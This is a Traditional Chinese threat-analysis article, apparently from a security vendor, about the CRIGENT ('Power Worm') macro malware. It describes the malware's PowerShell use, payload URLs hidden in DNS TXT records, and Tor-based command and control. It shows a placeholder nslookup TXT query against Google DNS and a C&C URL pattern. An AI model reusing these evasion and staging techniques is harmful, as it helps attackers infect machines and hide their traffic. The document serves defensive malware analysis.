利用Windows PowerShell感染 Word和 Excel檔案
惡意軟體已經針對 Word和 Excel檔案有好一段日子了,但趨勢科技最近看到一個新的惡意軟體家族 – CRIGENT(也被稱為「Power Worm」)帶來了一些新的技術。(趨勢科技將這些檔案偵測為W97M_CRIGENT.JER和X97M_CRIGENT.A。)
最引人注意的並不是建立或包含可執行程式碼,而是 CRIGENT 利用Windows PowerShell來執行其程序。PowerShell是一個功能強大的互動式 shell/腳本工具,可用在Windows的所有現行版本上(而且從Windows 7開始內建);該惡意軟體會透過PowerShell腳本來進行所有行為。因為IT管理員通常會找的是惡意二進位檔而可能會忽略掉它,因為使用這種技術的惡意軟體並不常見。
到達及其他組件
這種威脅會透過一個受感染的Word或Excel文件到達,可能是由其他惡意軟體所植入,或是經由使用者下載/存取。一旦打開,它會馬上從兩個著名的網路匿名專案下載另外兩個組件:Tor 網路以及Polipo,一個個人網頁快取/代理伺服器。
攻擊者會去掩飾這兩個檔案(經由變更它們的檔名),並且隱藏DNS記錄來掩蓋這些檔案的來源。這些檔案放在正常的雲端檔案儲存服務上(在此案例中是Dropbox和OneDrive)。這些檔案的網址被隱藏在DNS記錄中。這是如何做到的?
他會存取兩個不同網域的DNS記錄,並且在每個網域內建立一個子網域。不過他沒有將子網域對應到任何特定的IP地址。相反地,他儲存文字在DNS記錄中,再特別去查詢TXT記錄。(為了逃避本地端的DNS攔截,他會直接查詢Google的公共DNS伺服器),Windows內執行的命令是:
- nslookup -querytype=TXT {malicious domain} 8.8.8.8
每兩個查詢都會帶回字串,包含了指向正常雲端儲存供應商的網址。其中一個連結指向Dropbox,另外一個指向微軟OneDrive。對於檢查網路流量而沒有查看實際檔案的人來說,只會看到一對連向Google公共DNS伺服器的DNS查詢,並從兩個著名的雲端服務下載檔案。兩者都沒有什麼可疑之處。
命令與控制
利用已安裝的Tor和Polipo軟體,它會存取其命令和控制伺服器。它所用的網址包含兩個GUID,如下所示:
- {C&C server}/get.php?s=setup&mom={GUID #1}&uid={GUID #2}
奇怪的是,如果用缺少或不正確的GUID連上上述網站,C&C伺服器會出現下面這用德文所寫的輕微髒話:
圖一、C&C伺服器